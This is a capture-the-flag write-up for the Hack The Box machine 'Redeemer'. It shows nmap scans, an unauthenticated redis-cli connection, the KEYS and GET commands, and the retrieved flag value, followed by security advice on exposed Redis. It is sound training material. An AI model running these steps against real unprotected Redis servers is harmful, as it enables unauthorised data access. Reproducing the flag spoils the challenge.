Redeemer β Hack The Box
by
π§ Summary
Redeemer is a very easy HTB machine focusing on exploiting an exposed Redis database with no authentication. The goal is to enumerate open ports, connect to Redis, and retrieve the stored flag.
π― Target Information
- IP Address:
10.129.10.227 - OS: Linux (based on Redis service)
- Difficulty: Very Easy
- Tags: Redis, Database Exploitation, Anonymous Access, Enumeration
π Tools Used
- Nmap β Network scanning
- redis-cli β Redis client for interaction
β Steps to Exploit
1. Enumerate Open Ports with Nmap
Perform a full TCP scan to discover open ports:
nmap -p- --open 10.129.10.227
Result: Port 6379 open (Redis).
Run a detailed scan on port 6379:
nmap -sC -sV -p 6379 10.129.10.227
Output shows:
6379/tcp open redis Redis key-value store 5.0.7
2. Connect to Redis
Using redis-cli:
redis-cli -h 10.129.10.227
Once connected, list all keys:
KEYS *
Retrieve the value of the key named flag:
GET flag
Flag:
03e1d2b376c37ab3f5319922053953eb
β οΈ Security Note
Redis should never be exposed to the internet without authentication. Misconfiguration can allow attackers to:
- Read/write sensitive data.
- Persist backdoors on the system.
- Escalate to full system compromise.
Key Takeaways
- Always scan for unusual open ports.
- Redis without AUTH is a critical misconfiguration.
- Use nmap βscript redis-info for additional enumeration in real-world scenarios.